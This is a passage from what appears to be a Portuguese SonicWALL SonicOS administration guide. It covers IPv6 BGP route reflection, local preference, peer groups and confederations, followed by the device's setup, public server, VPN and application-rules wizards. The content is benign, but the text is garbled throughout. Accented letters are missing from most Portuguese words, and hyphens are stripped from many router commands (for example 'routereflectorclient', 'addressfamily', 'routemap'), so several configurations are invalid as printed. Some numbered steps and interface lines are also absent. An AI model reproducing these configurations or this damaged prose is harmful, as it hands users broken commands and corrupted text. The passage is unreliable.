no AS intermedirio executarem o BGP. A desabilitao da sincronizao permite transmitir
menos rotas no seu IGP e permite ao BGP convergir mais rapidamente.
Para desabilitar a sincronizao do BGP no RTB do AS100:
No RTB:
router bgp 100
!
address-family ipv6
exit-address-family

Reflexo de rotas do BGP
Por padro, todos os roteadores iBGP em um AS devem estar em uma configurao de malha
completa. Cada roteador deve estar configurado como um par para cada outro roteador.
Com a reflexo de rotas, todos os roteadores iBGP no precisam estar totalmente
entrelaados. A reflexo de rotas elimina a necessidade de cada roteador iBGP de comunicar
com qualquer outro roteador iBGP no AS. Um roteador iBGP pode ser designado como o
refletor de rotas e pode passar as rotas aprendidas do iBGP para vrios clientes iBGP.
Se um roteador estiver configurado como um refletor de rotas, este atuar como um ponto
nico em que todos os outros roteadores iBGP podem obter as rotas aprendidas do iBGP. O
refletor de rotas atua como um servidor, ao invs de um par, para qualquer outro roteador no
AS. Todos os outros roteadores IBGP tornam-se clientes do refletor de rotas. Um roteador
um refletor de rotas desde que tenha pelo menos um cliente refletor de rotas.
Para configurar a reflexo de rotas em um AS:
No RouterA:
interface Serial0/0
ipv6 address 2011:12:12:12::1/64
ipv6 ospf 10 area 0
interface Serial0/1
ipv6 address 2011:13:13:13::1/64
ipv6 ospf 10 area 0
router bgp 100

no bgp default ipv4unicast
bgp logneighborchanges
neighbor 2011:22:22:22::22 updatesource Loopback0
!
addressfamily ipv6
neighbor 2011:22:22:22::22 routereflectorclient
| 1409
neighbor 2011:33:33:33::33 routereflectorclient
exitaddressfamily
!
ipv6 router ospf 10
routerid 1.1.1.1
No RRClient1:
interface Loopback0
ipv6 address 2011:22:22:22::22/128
ipv6 ospf 10 area 0
!
interface Loopback10
ipv6 address 1010:10:10:10::10/128
interface Serial0/0
ipv6 address 2011:12:12:12::2/64
ipv6 ospf 10 area 0
!
router bgp 100
!
addressfamily ipv6
network 1010:10:10:10::10/128
exitaddressfamily
!
ipv6 router ospf 10
routerid 2.2.2.2
RRClient2:
interface Loopback0
ipv6 address 2011:33:33:33::33/128
ipv6 ospf 10 area 0
!
ipv6 address 2020:20:20:20::20/128
!
interface Serial0/0
no ip address
ipv6 address 2011:13:13:13::2/64
ipv6 ospf 10 area 0
!
router bgp 100
!
addressfamily ipv6
network 2020:20:20:20::20/128
exitaddressfamily
!
ipv6 router ospf 10

routerid 3.3.3.3
logadjacencychanges
Para verificar as rotas, use o comando show bgp ipv6 unicast:
No RRClient1:
RRClient1> show bgp ipv6 unicast
Dever ver a rota 2020:20:20:20::20/128.
No RRClient2:
RRClient2> show bgp ipv6 unicast
Dever ver a rota 1010:10:10:10::10/128.
Preferncia de local do BGP IPv6

A preferncia de local designa uma rota para uma determinada rede como a rota de sada
preferida para essa rede a partir do AS. A rota com uma preferncia de local mais elevada a
rota preferida. O valor padro da preferncia de local 100, mas isto pode ser alterado usando
o comando set local-preference.
Para configurar a preferncia de local de uma rota preferida em um AS:
No R1:
interface Loopback0
ipv6 address 1111:111:111:A::/64 eui64
ipv6 ospf 10 area 0
interface FastEthernet0/0
ipv6 address AB01:CD1:123:A::/64 eui64
ipv6 ospf 10 area 0
!
interface Serial0/0
ipv6 address AB01:CD1:123:C::/64 eui64
!
ipv6 address AB01:CD1:123:B::/64 eui64
| 1411
ipv6 ospf 10 area 0
!
ipv6 router ospf 10 routerid 1.1.1.1 logadjacencychanges
redistribute connected routemap CONNECTED
!
routemap CONNECTED permit 10
match interface Serial0/0
!
router bgp 123
neighbor 2222:222:222:A:C602:3FF:FEF0:0 remoteas 123
neighbor 2222:222:222:A:C602:3FF:FEF0:0 updatesource Loopback0
neighbor AB01:CD1:123:C:C604:16FF:FE98:0 remoteas 101
neighbor AB01:CD1:123:C:C604:16FF:FE98:0 ebgpmultihop 5
!
addressfamily ipv6
neighbor 2222:222:222:A:C602:3FF:FEF0:0 activate
neighbor 2222:222:222:A:C602:3FF:FEF0:0 nexthopself
neighbor AB01:CD1:123:C:C604:16FF:FE98:0 activate exitaddressfamily
No R2:
interface Loopback0
ipv6 address 2222:222:222:A::/64 eui64
ipv6 ospf 10 area 0
!
ipv6 address AB01:CD1:123:A::/64 eui64
ipv6 ospf 10 area 0
!
ipv6 address AB01:CD1:123:D::/64 eui64
ipv6 ospf 10 area 0
!
ipv6 router ospf 10 routerid 2.2.2.2 logadjacencychanges
!
router bgp 123
addressfamily ipv6
exitaddressfamily
No R3:
interface Loopback0
ipv6 address 3333:333:333:A::/64 eui64
ipv6 ospf 10 area 0
!

ipv6 address AB01:CD1:123:B::/64 eui64
ipv6 ospf 10 area 0
!
interface Serial0/0
ipv6 address AB01:CD1:123:E::/64 eui64
!
ipv6 address AB01:CD1:123:D::/64 eui64
ipv6 ospf 10 area 0
!
ipv6 router ospf 10
routerid 3.3.3.3
redistribute connected routemap CONNECTED
!
router bgp 123
no synchronization
neighbor AB01:CD1:123:E:C605:16FF:FE98:0 remoteas 202
neighbor AB01:CD1:123:E:C605:16FF:FE98:0 ebgpmultihop 5
!
addressfamily ipv6
neighbor 1111:111:111:A:C601:3FF:FEF0:0 routemap LOCAL_PREF out
neighbor 2222:222:222:A:C602:3FF:FEF0:0 routemap LOCAL_PREF out
neighbor AB01:CD1:123:E:C605:16FF:FE98:0 activate
exitaddressfamily
!
ipv6 prefixlist 10 seq 5 permit BC01:BC1:10:A::/64
!
routemap LOCAL_PREF permit 10
match ipv6 address prefixlist 10
set localpreference 500
!
routemap LOCAL_PREF permit 20
!
routemap CONNECTED permit 10
match interface Serial0/0
No R4:
interface Serial0/0
ipv6 address AB01:CD1:123:C::/64 eui64
!
ipv6 address BC01:BC1:10:A::/64 eui64
!
!
router bgp 101

| 1413
neighbor AB01:CD1:123:C:C601:3FF:FEF0:0 remoteas 123
!
addressfamily ipv6
neighbor AB01:CD1:123:C:C601:3FF:FEF0:0 activate
network BC01:BC1:10:A::/64 network BC02:BC1:11:A::/64
network BC03:BC1:12:A::/64 exitaddressfamily
No R5:
interface Serial0/0
ipv6 address AB01:CD1:123:E::/64 eui64
clock rate 2000000
!
!
!
!
router bgp 202
neighbor AB01:CD1:123:E:C603:3FF:FEF0:0 remoteas 123
neighbor AB01:CD1:123:E:C603:3FF:FEF0:0 ebgpmultihop 5
!
addressfamily ipv6
neighbor AB01:CD1:123:E:C603:3FF:FEF0:0 activate
network BC01:BC1:10:A::/64
exitaddressfamily
Para verificar a rota, use o comando show bgp ipv6 unicast:
No R2:
Antes de a preferncia de local ser configurada, o R2 tem o R1 como o seu prximo salto para
todos os endereos IPv6 aprendidos. Aps configurar a preferncia de local no R3 para o 500,
o R2 tem uma rota de sada preferida diferente para o prefixo BC01:BC1:10:A::/64. O R2 pode
agora alcanar o prefixo BC01:BC1:10:A::/64 por meio do caminho de sada do R3, que
agora designado como a preferncia de local.

Polticas de atualizao do grupo de pares do BGP
Um grupo de pares do BGP um grupo de vizinhos do BGP que compartilham as mesmas
polticas de atualizao. As polticas de atualizao so tipicamente definidas por mapas de
rotas, listas de distribuio e listas de filtros.
Se definir um grupo de pares e adicionar vizinhos, todas as polticas de atualizao atribudas
a esse grupo de pares aplicam-se a todos os vizinhos nesse grupo de pares. No necessrio
definir uma poltica para cada vizinho.
Os membros de um grupo de pares herdam todas as definies de configurao desse grupo
de pares. possvel configurar determinados membros para substituir as polticas de
atualizao, mas somente se essas polticas forem definidas para o trfego de entrada. No
possvel configurar membros para substituir polticas de grupo se as polticas se aplicarem ao
trfego de sada.
Para configurar um grupo de pares do BGP IPv6 e suas polticas de atualizao:
No R3:
router bgp 123
no synchronization
neighbor interalmap peer-group
neighbor interalmap remote-as 123
neighbor 1111:111:111:A:C601:3FF:FEF0:0 peer-group interalmap
neighbor AB01:CD1:123:E:C605:16FF:FE98:0 remoteas 202
neighbor AB01:CD1:123:E:C605:16FF:FE98:0 ebgpmultihop 5
!
addressfamily ipv6
neighbor interalmap activate
neighbor interalmap route-map 1 out
exitaddressfamily
!
ipv6 prefixlist 10 seq 5 permit BC01:BC1:10:A::/64
| 1415
!
route-map 1 permit 10
match ipv6 address prefix-list 1 set tag 333
set metric 273
Para verificar se a rota de preferncia de local est configurada, use o comando show bgp
ipv6 unicast:
No R3:
Verifique se o endereo IPv6 BC01:BC1:10:A::/64 passa do AS100 para o R1 e R2 e se a

mtrica e a preferncia de local esto definidas com as configuraes de mapa de rotas
correspondentes.
Confederao do BGP
possvel dividir um nico AS em vrios ASs e atribuir estes vrios ASs em uma nica
configurao de ASs. A implementao de uma confederao do BGP reduz o tamanho da
malha iBGP do AS e a confederao pode ainda anunciar como um nico AS para pares
externos.
Cada AS individual em uma confederao executa o iBGP totalmente entrelaado e cada AS
individual na confederao tambm executa as conexes de eBGP para outros ASs dentro da
confederao. Estes pares do eBGP na confederao trocam informaes de roteamento
como se usassem o iBGP. Desta forma, a confederao preserva as informaes do prximo
salto, a mtrica e a preferncia de local. Para o mundo exterior, a confederao parece ser um
nico AS.
Para configurar uma confederao do BGP:

R1:
router bgp 2000
bgp confederation identifier 200
bgp confederation peers 1000

!
address-family ipv4
exit-address-family
!
address-family ipv6
network 3002::/64
network 4000::/64
exit-address-family
No R2:
router bgp 1000
!
address-family ipv6
exit-address-family
No R3:
router bgp 1000
bgp confederation peers 2000
!
address-family ipv6
exit-address-family
No R5:
router bgp 100
!
address-family ipv6
network 6666::6/128
network 7777::7/128
exit-address-family
Verifique se o R1, R2 e o R3 podem aprender esta rota que anunciada pelo R5:
6666::6/128 and 7777::7/128
Verifique se o R2 pode aprender esta rota do R1 mesmo se estes no estiverem diretamente

conectados:
3002::/64 and 4000::/64
| 1417
Nota Os dados de configurao do BGP IPv6 e as rotas do BGP IPv6 so despejados em um
arquivo Terminate and Stay Resident (TSR).
Nota O BGP IPv6 usa a interface de depurao ZebOS. As configuraes padro para todos os
comutadores de depurao esto fechadas. A insero do comando debug da CLI no
console abre o comutador de depurao.
Termos de BGP
ARD domnio de roteamento autnomo uma coleo de redes/roteadores que tm uma
poltica de roteamento administrativa comum.
AS sistema autnomo um ARD ao qual foi atribudo um nmero de identificao,
geralmente executando BGP4 no(s) roteador(es) de limite.
BGP4 Border Gateway Protocol 4: Os EGP mais comuns.
CIDR roteamento entre domnios sem classe, permite o anncio eficiente de rotas atravs
de agregao de rotas.
CPE equipamentos nas instalaes do cliente os equipamentos no limite da rede de um
cliente usados para a interface com o ISP.
EGP protocolo de gateway exterior qualquer protocolo (na prtica, BGP4) usado para
comunicar informaes de roteamento entre sistemas autnomos.
Rotas completas toda a tabela de roteamento do BGP global.
FIB base de informaes de encaminhamento a nossa tabela de rotas existente usada para
encontrar a interface de egresso e o next hop ao encaminhar pacotes.
Looking Glass * um servidor Looking Glass (LG) uma visualizao somente de leitura de
roteadores de organizaes executando servidores LG. Normalmente, servidores looking glass
publicamente acessveis so executados por ISPs ou NOCs.
Hospedagem mltipla um cliente de ISP que tem mltiplas conexes a um ou mais ISPs.
Provedor mltiplo um cliente de ISP que usa mltiplos ISPs para estabelecer conexo com
a Internet.
NSM mdulo de servios de rede o componente ZebOS que centraliza a interface na FIB
e na RIB. Os daemons do protocolo de roteamento separado estabelecem uma interface com
o NSM para todas as atualizaes da RIB. O NSM atualiza a FIB com informaes de melhor
rota da RIB.
Rotas parciais um subconjunto da tabela de rotas completa do BGP, normalmente especfico
para destinos que fazem parte de um domnio de ISP.
RIB base de informaes de rotas um banco de dados em tempo de execuo da
propriedade do NSM usado para armazenar todas as informaes de rotas coletadas e usado
pelos protocolos de roteamento.

Apndice C
Usar os assistentes de configurao
SonicWALL
O SonicOS fornece assistentes de configurao fceis de usar para ajudar os administradores

de rede na criao da poltica inicial. Inicie o assistente de configurao SonicWALL clicando
no boto Assistentes no canto superior direito da interface de gerenciamento do SonicOS.

Assistentes > Assistente de configurao na pgina 1419
Assistentes > Assistente de servidor pblico na pgina 1425
Assistentes > Assistente de VPN na pgina 1429
Assistentes > Assistente de regras de aplicativos na pgina 1439
Assistentes > Assistente de configurao

Na primeira vez que voc efetuar login em seu dispositivo SonicWALL, o Assistente de
configurao iniciado automaticamente. Para iniciar o Assistente de configurao a
qualquer momento a partir da interface de gerenciamento, clique no boto Assistentes no
canto superior direito e selecione Assistente de configurao.
| 1419
Dica Voc tambm pode configurar todas as suas configuraes de rede e de WAN na pgina
Rede > Configuraes da interface de gerenciamento SonicWALL.
Usar o assistente de configurao

O assistente de configurao ajuda voc a definir as seguintes configuraes:
Configurao do modo de rede WAN e da rede WAN
Configurao da rede LAN
Configurao da rede de LAN sem fio (dispositivos sem fio)
Configurar um endereo IP esttico com NAT habilitada

O uso da NAT para configurar seu SonicWALL acaba com a necessidade de endereos IP
pblicos para todos os computadores na sua LAN. uma forma de preservar os endereos IP
disponveis no pool de endereos IPv4 da Internet. A NAT tambm permite que voc oculte o
esquema de endereamento de sua rede. Se voc no tiver endereos IP individuais
suficientes para todos os computadores da sua rede, voc poder usar a NAT para a sua
configurao de rede.
Essencialmente, a NAT converte os endereos IP de uma rede naqueles de uma rede
diferente. Como uma forma de filtragem de pacotes para firewalls, ela protege uma rede contra
intruses externas de hackers, substituindo o endereo IP interno (LAN) em pacotes que
passam por um SonicWALL com um endereo "falso" de um pool de endereos fixo. Os
endereos IP reais de computadores na LAN no so visualizados externamente.
Esta seo descreve a configurao do dispositivo de segurana de rede Dell SonicWALL no
modo NAT. Se voc tiver um nico endereo IP atribudo por seu ISP, siga as instrues
abaixo.
Dica Certifique-se de que possui as informaes de rede, incluindo o endereo IP da WAN, a

mscara de sub-rede e as configuraes de DNS. Estas informaes so obtidas atravs
do seu ISP.
Iniciar o assistente de configurao

Etapa 1 Clique no boto Assistente no canto superior direito da interface de gerenciamento do
SonicOS. Na tela de boas-vindas, selecione o Assistente de configurao e, em seguida,
clique em Avanar.

Alterar senha
Etapa 2 Para definir a senha, digite uma nova senha nos campos Nova senha e Confirmar nova
senha. Clique em Avanar.
Dica muito importante escolher uma senha que no pode ser facilmente adivinhada por
terceiros.
| 1421
Alterar fuso horrio
Etapa 3 Selecione o Fuso horrio apropriado no menu Fuso horrio. O relgio interno do SonicWALL
definido automaticamente por um servidor de horrio da rede na Internet. Clique em
Avanar.
Modo de rede WAN

Etapa 4 Confirme se voc possui as informaes de rede corretas, necessrias para configurar o
SonicWALL para acessar a Internet. Para dispositivos de segurana de rede Dell SonicWALL,
o modo de rede WAN est definido para IP esttico.
Etapa 5 Clique em Avanar.
Configuraes de rede WAN

Etapa 6 Digite o endereo IP pblico fornecido pelo seu ISP no campo Endereo IP de WAN do
SonicWALL e, em seguida, preencha os restantes campos: Mscara de sub-rede da WAN,
Endereo de gateway (roteador) da WAN e Endereos do servidor de DNS.
Etapa 8 Continue para Configuraes de LAN na pgina 1423.

Configuraes de LAN
Etapa 9 A pgina LAN permite a configurao de Endereos IP de LAN do SonicWALL e Mscara

de sub-rede de LAN. Os Endereos IP de LAN do SonicWALL so os endereos IP privados
atribudos porta LAN do SonicWALL. A Mscara de sub-rede da LAN define o intervalo de
endereos IP na LAN. Os valores padro fornecidos pelo SonicWALL funcionam para a maioria
das redes. Se voc no usar as configuraes padro, digite seu endereo IP privado preferido
e a mscara de sub-rede nos campos. Clique em Avanar.
| 1423
Configuraes de DHCP de LAN
Etapa 10 A janela Servidor DHCP SonicWALL opcional configura o Servidor DHCP SonicWALL. Se
habilitado, o SonicWALL define automaticamente as configuraes de IP de computadores na
LAN. Para habilitar o servidor DHCP, selecione Habilitar servidor DHCP e especifique o
intervalo de endereos IP que sero atribudos a computadores na LAN.
Se a opo Desabilitar servidor DHCP for selecionada, ser necessrio configurar cada
computador na rede com um endereo IP esttico em sua LAN. Clique em Avanar.
Resumo de configurao do SonicWALL

Etapa 11 A janela Resumo de configurao exibe a configurao definida usando o assistente de
instalao. Para modificar qualquer uma das configuraes, clique em Voltar para retornar
janela Conexo com a Internet. Se a configurao estiver correta, clique em Avanar.
Etapa 12 O SonicWALL armazena as configuraes de rede. Clique em Fechar para retornar interface
de gerenciamento do SonicWALL.

Assistentes > Assistente de servidor pblico
SonicOS. Na tela de boas-vindas, selecione o Assistente de servidor pblico e, em seguida,
clique em Avanar.
Etapa 2 Selecione o tipo de servidor na lista Tipo de servidor. Dependendo do tipo que voc
selecionar, os servios disponveis se alteram. Assinale a caixa dos servios que voc est
habilitando neste servidor. Clique em Avanar
| 1425
Etapa 3 Insira o nome do servidor.
Etapa 4 Insira o endereo IP privado do servidor. Especifique um endereo IP no intervalo de
endereos atribudos zona onde voc deseja colocar este servidor. O assistente de servidor
pblico atribuir automaticamente o servidor zona qual pertence seu endereo IP. Clique
em Avanar.

Etapa 5 Insira o endereo IP pblico do servidor. O padro o endereo IP pblico da WAN. Se voc
inserir um IP diferente, o assistente de servidor pblico criar um objeto de endereo para esse
endereo IP e associar o objeto de endereo zona de WAN. Clique em Avanar.
Etapa 6 A pgina Resumo exibe um resumo da configurao selecionada no assistente.
| 1427
Objetos de endereos do servidor O assistente cria o objeto de endereo do novo
servidor. Uma vez que o endereo IP do servidor adicionado no exemplo est no intervalo
de endereos IP atribudos ao DMZ, o assistente associa o objeto de endereo zona
DMZ. Ele atribui um nome ao objeto com base no nome especificado para o servidor, mais
a expresso "_privado". Se voc especificar um IP no intervalo de outra zona, ele
associar o objeto de endereo a essa zona. Se voc especificar um endereo IP fora do
intervalo de qualquer zona que configurou, o assistente associar o objeto de endereo
zona de LAN.
Uma vez que o servidor no exemplo usou o endereo IP da WAN padro para Endereo
IP pblico do servidor, o assistente determina que ele usar o objeto de endereo da
WAN existente durante a construo de polticas entre o servidor novo e a WAN. Se voc
especificar outro endereo, o servidor criar um objeto para esse endereo associado
zona de WAN e atribuir um nome ao novo objeto de endereo com base no nome
especificado para o servidor, mais a expresso "_pblico".
Objeto de grupo de servios do servidor O assistente cria um objeto de grupo de
servios para os servios usados pelo novo servidor. Uma vez que o servidor no exemplo
um servidor Web, o grupo de servios inclui HTTP e HTTPS. Dessa forma, voc tem um
grupo conveniente de referncia ao criar ou editar polticas de acesso para este servidor.
Polticas de NAT do servidor O assistente cria uma poltica de NAT para converter os
endereos de destino de todos os pacotes de entrada com um dos servios no novo grupo
de servios e dirigidos ao endereo de WAN para o endereo do novo servidor. Assim,
neste exemplo, se um pacote com o tipo de servio de HTTPS surgir dirigido interface de
WAN (10.0.93.43), a poltica de NAT converter seu endereo em 172.22.2.44.
O assistente tambm cria uma poltica de NAT de loopback para converter trfego HTTP e
HTTPS da sua rede dirigido ao endereo IP da WAN de volta para o endereo do servidor
de e-mail.

Regras de acesso do servidor O assistente cria uma poltica de acesso permitindo todo
o servio de trfego de e-mail da zona de WAN para o DMZ.
Etapa 7 Clique em Aceitar na pgina Resumo da configurao do servidor pblico para concluir o
assistente e aplicar a configurao no seu SonicWALL.
Dica O novo endereo IP usado para acessar o servidor novo, interna e externamente, exibido
no campo URL da janela Parabns.
Etapa 8 Clique em Fechar para fechar o assistente.
Assistentes > Assistente de VPN

O Assistente de poltica de VPN acompanha-o passo a passo na configurao de VPN de
grupo no SonicWALL. Aps a concluso da configurao, o assistente cria as configuraes
de VPN necessrias para a poltica de VPN selecionada. Voc pode usar a interface de
gerenciamento do SonicWALL para acessar opes avanadas de configurao opcionais.
| 1429
Usar o assistente de poltica de VPN
SonicOS. Na tela de boas-vindas, selecione o Assistente de poltica de VPN e, em seguida,
clique em Avanar.
Etapa 2 Na pgina Tipo de poltica de VPN, selecione VPN de grupo da WAN e clique em Avanar.
Etapa 3 Na pgina Mtodo chave IKE Fase 1, voc poder selecionar a chave de autenticao a usar
para esta poltica de VPN:

Chave padro: Se voc escolher a chave padro, todos os clientes de VPN globais
usaro automaticamente a chave padro gerada pelo SonicWALL, a fim de autenticar
com o SonicWALL.
Usar esta chave: Se voc escolher uma chave personalizada previamente
compartilhada, voc precisa distribuir a chave para cada cliente de VPN, uma vez que
esta chave ser solicitada ao usurio no momento da conexo ao SonicWALL.
| 1431
Nota Se voc selecionar Usar esta chave e deixar a chave padro como o valor, voc deve ainda
distribuir a chave para seus clientes de VPN.

Etapa 5 Na pgina Configuraes de segurana IKE, voc poder selecionar as configuraes de
segurana para negociaes IKE Fase 2 e para o tnel VPN. Voc pode usar as configuraes-
padro.
Grupo DH: O grupo Diffie-Hellman (DH) o grupo de nmeros usados para criar o par
de chaves. Cada grupo subsequente usa nmeros maiores para comear. Voc pode
escolher Grupo 1, Grupo 2, Grupo 5 ou Grupo 14. A VPN usa isto durante a negociao
IKE para criar o par de chaves.
Criptografia: Este o mtodo para criptografar dados por meio do tnel VPN. Os
mtodos so listados por ordem de segurana. DES o menos seguro e o que leva
menos tempo para criptografar e descriptografar. AES-256 o mais seguro e o que
leva mais tempo para criptografar e descriptografar. Voc pode optar. DES, 3DES,
AES-128 ou AES-256. A VPN usa isso para todos os dados atravs do tnel.
Autenticao: Este o mtodo de hash usado para autenticar a chave, uma vez que
ele trocado durante a negociao IKE. Voc pode escolher MD5 ou SHA-1.
Durao (segundos): Esta a quantidade de tempo que o tnel VPN permanece aberto
antes de ser necessria nova autenticao. O padro de oito horas (28800).

Aviso O SonicWALL Global VPN Client verso 1.x no compatvel com a criptografia AES e,
portanto, se voc escolher esse mtodo, somente as verses 2.x e superiores do
SonicWALL Global VPN Client conseguiro se conectar.

Etapa 7 Na pgina Autenticao do usurio, selecione se deseja que os usurios de VPN necessitem
realizar a autenticao no firewall no momento da conexo. Se voc selecionar Habilitar
autenticao do usurio, dever selecionar o grupo de usurios que contm os usurios de
VPN. Para esse exemplo, deixe desmarcada a opo Habilitar autenticao do usurio.
Nota Se voc habilitar a autenticao do usurio, os usurios devem ser inseridos no banco de
dados do SonicWALL para autenticao. Os usurios so inseridos no banco de dados do
SonicWALL na pgina Usurios > Usurios locais e, em seguida, adicionados aos grupos
na pgina Usurios > Grupos locais.
Etapa 9 Na pgina Configurar adaptador de IP virtual, selecione se deseja usar o servidor DHCP
interno do SonicWALL para atribuir endereos IP a cada cliente de VPN a partir do intervalo de
IP da zona de LAN. Portanto, quando um usurio se conecta, parece que o usurio est dentro
da LAN. Marque a caixa Usar adaptador de IP virtual e clique em Avanar.
Etapa 10 A pgina Resumo de configurao fornece detalhes sobre as configuraes que sero
enviadas para o SonicWALL ao aplicar a configurao. Clique em Aceitar para criar seu VPN
de grupo.
| 1433
Conectar os clientes de VPN globais
Os clientes de VPN globais remotos do SonicWALL instalam o software Global VPN Client.
Assim que o aplicativo estiver instalado, eles usam um assistente de conexo para configurar
sua conexo VPN. Para configurar a conexo VPN, o cliente deve ter as seguintes
informaes:
Um endereo IP pblico (ou nome de domnio) da porta WAN para seu SonicWALL
O segredo compartilhado se voc tiver selecionado um segredo personalizado
previamente compartilhado no assistente de VPN.
O nome de usurio e a senha de autenticao.
Configurar um VPN site a site usando o assistente de VPN

Voc usa o Assistente de poltica de VPN para criar a poltica de VPN site a site.

Usar o assistente de VPN para configurar o segredo previamente compartilhado

SonicOS. Na tela de boas-vindas, selecione o Assistente de poltica de VPN e, em seguida,
clique em Avanar.
Etapa 2 Na pgina Tipo de poltica de VPN, selecione Site a site e clique em Avanar.
Etapa 3 Na pgina Criar poltica site a site, digite as seguintes informaes:
| 1435
Nome da poltica: Insira um nome que voc pode usar para se referir poltica. Por
exemplo, Escritrio de Boston.
Chave pr-compartilhada: Insira uma cadeia de caracteres a ser usada para autenticar
trfego durante a negociao IKE Fase 1. Voc pode usar a chave pr-compartilhada
padro gerada pela SonicWALL.
Sei qual o meu endereo IP de mesmo nvel remoto (ou FQDN): Se voc marcar esta
opo, a SonicWALL pode iniciar o contato com o par remoto nomeado.
Se voc no marcar esta opo, o par deve iniciar o contato para criar um tnel VPN.
Este dispositivo usar o modo agressivo para a negociao IKE.
Para esse exemplo, deixe a opo desmarcada.

Endereo IP de mesmo nvel remoto (ou FQDN): Se a opo acima estiver assinalada,
digite o endereo IP ou nome de domnio totalmente qualificado (FQDN) do par remoto
(por exemplo, boston.yourcompany.com).
Etapa 5 Na pgina Seleo de rede, selecione os recursos local e de destino que esta VPN conectar:
Redes locais: Selecione os recursos de rede local protegidos por este SonicWALL que
voc est conectando com esta VPN. Voc pode selecionar qualquer objeto ou grupo
de endereos no dispositivo, incluindo redes, sub-redes, servidores individuais e
endereos IP de interface.
Se o objeto ou grupo que voc deseja ainda no foi criado, selecione Criar objeto ou
Criar grupo. Crie o novo objeto ou grupo na caixa de dilogo que for apresentada. Em
seguida, selecione o novo objeto ou grupo. Para esse exemplo, selecione sub-redes
LAN.
| 1437
Redes de destino: Selecione os recursos de rede no destino do tnel VPN. Se o objeto
ou grupo no existir, selecione Criar novo objeto de endereo ou Criar novo grupo de
endereos. Por exemplo:
a. Selecione Criar novo grupo de endereos.
b. No campo Nome, insira "Grupo LAN".

c. Na lista no lado esquerdo, selecione Sub-redes LAN e clique no boto ->.
d. Clique em OK para criar o grupo e retornar pgina Seleo de rede.
e. No campo Redes de destino, selecione o grupo recentemente criado.
Etapa 7 Na pgina Configuraes de segurana IKE, selecione as configuraes de segurana para
as negociaes IKE Fase 2 e para o tnel VPN. Voc pode usar as configuraes-padro.

Grupo DH: O grupo Diffie-Hellman (DH) o grupo de nmeros usados para criar o par
de chaves. Cada grupo subsequente usa nmeros maiores para comear. Voc pode
escolher Grupo 1, Grupo 2, Grupo 5 ou Grupo 14. A VPN usa isto durante a negociao
IKE para criar o par de chaves.
Criptografia: Este o mtodo para criptografar dados por meio do tnel VPN. Os
mtodos so listados por ordem de segurana. DES o menos seguro e o que leva
menos tempo para criptografar e descriptografar. AES-256 o mais seguro e o que
leva mais tempo para criptografar e descriptografar. Voc pode optar. DES, 3DES,
AES-128 ou AES-256. A VPN usa isso para todos os dados atravs do tnel
Autenticao: Este o mtodo de hash usado para autenticar a chave, uma vez que
ele trocado durante a negociao IKE. Voc pode escolher MD5 ou SHA-1.
Durao (segundos): Esta a quantidade de tempo que o tnel VPN permanece aberto
antes de ser necessria nova autenticao. O padro de oito horas (28800).
Etapa 8 A pgina Resumo de configurao fornece detalhes sobre as configuraes que sero
enviadas para o dispositivo de segurana ao aplicar a configurao.
Etapa 9 Clique em Aceitar para criar a VPN.
Assistentes > Assistente de regras de aplicativos

O assistente Regras de aplicativos fornece configurao de segurana para muitos casos de
uso comum, mas no para todos. Se, a qualquer momento durante o assistente, voc no
conseguir encontrar as opes desejadas, voc pode clicar em Cancelar e continuar usando a
configurao manual. Consulte Controle de aplicativos na pgina 573 para obter mais
informaes sobre a configurao manual. Para usar o assistente para configurar regras de
aplicativos, execute as seguintes etapas:
Etapa 1 Faa login no dispositivo de segurana SonicWALL.

Etapa 2 No banner SonicWALL na parte superior da tela, clique no cone Assistentes. A tela Bem-
vindo(a) dos assistentes ser exibida.
Etapa 3 Selecione o boto de opo Assistente de regras de aplicativos e, em seguida, clique em
Avanar.
Etapa 4 Na tela de Introduo do assistente de regras de aplicativos, clique em Avanar.
Etapa 5 Na tela de tipo de poltica de regras de aplicativos, selecione um tipo de poltica e, em seguida,
clique em Avanar.
Voc pode escolher a transferncia de arquivos SMTP, POP3 de entrada, Acesso Web ou
FTP. A poltica que voc criar s se aplica ao tipo de trfego que voc selecionar. A prxima
tela ir variar, dependendo de sua escolha aqui.
Etapa 6 Na tela Selecionar regras <sua escolha> para poltica de regras de aplicativos, selecione uma
regra de poltica nas opes fornecidas e, em seguida, clique em Avanar.
Dependendo da sua escolha na etapa anterior, a tela uma das quatro telas possveis:
Selecionar regras de SMTP para a poltica de regras de aplicativos
Selecionar regras de POP3 para a poltica de regras de aplicativos
Selecionar regras de acesso da Web para a poltica de regras de aplicativos
| 1439
Selecionar regras de FTP para a poltica de regras de aplicativos
Etapa 7 A tela exibida aqui poder variar, dependendo de sua escolha de regras de polticas na etapa
anterior. Para as seguintes regras de polticas, o assistente mostra a tela Definir contedo do
objeto de regras de aplicativos na qual voc poder selecionar a direo do trfego a verificar
e o contedo ou as palavras-chave para correspondncia.
Todos os tipos de regras da poltica de SMTP, exceto Especificar o tamanho mximo
do e-mail
Todos os tipos de regras da poltica de POP3
Todos os tipos de regras da poltica de acesso da Web
Todos os tipos de poltica de FTP, exceto Tornar todo o acesso FTP somente leitura
e No permitir o uso do comando SITE
Na tela Definir contedo do objeto de regras de aplicativos, execute as seguintes etapas:
Etapa 8 Na lista suspensa Direo, selecione a direo do trfego a verificar na lista suspensa.
Selecione uma das opes de Entrada, Sada ou Ambas.
Etapa 9 Efetue uma das seguintes aes:
Nota Se voc tiver selecionado uma opo com as palavras exceto as especificadas na
etapa anterior, o contedo que voc inserir aqui ser o nico contedo que no far
com que a ao ocorra.
Na caixa de texto Contedo, digite ou cole um texto ou uma representao

hexadecimal do contedo para correspondncia e, em seguida, clique em Adicionar.
Repita at todo o contedo ser adicionado caixa de texto Lista.
Para importar palavras-chave a partir de um arquivo de texto predefinido que contenha
uma lista de valores de contedo, um por linha, clique em Carregar a partir de
arquivo.
Se voc selecionou um tipo de poltica na etapa anterior que no resultou na tela Definir
contedo do objeto de regras de aplicativos com as opes-padro, o assistente exibe uma
tela que permite selecionar a direo de trfego e outras opes especficas, dependendo do
tipo de poltica.
Etapa 11 Na lista suspensa Direo, selecione a direo de trfego a verificar.
Etapa 12 SMTP: Na tela Definir o tamanho mximo do e-mail, na caixa de texto Tamanho mximo do e-
mail, digite o nmero mximo de bytes de uma mensagem de e-mail.
Etapa 13 Acesso da Web: Na tela de caso especial Definir contedo do objeto de regras de aplicativos,
a caixa de texto Contedo tem uma lista suspensa com um nmero limitado de opes e no
est disponvel nenhum boto de Carregar a partir de arquivo. Selecione um navegador na lista
suspensa.
Etapa 14 FTP: Na tela de caso especial Definir contedo do objeto de regras de aplicativos, voc pode
selecionar apenas a direo do trfego a verificar.
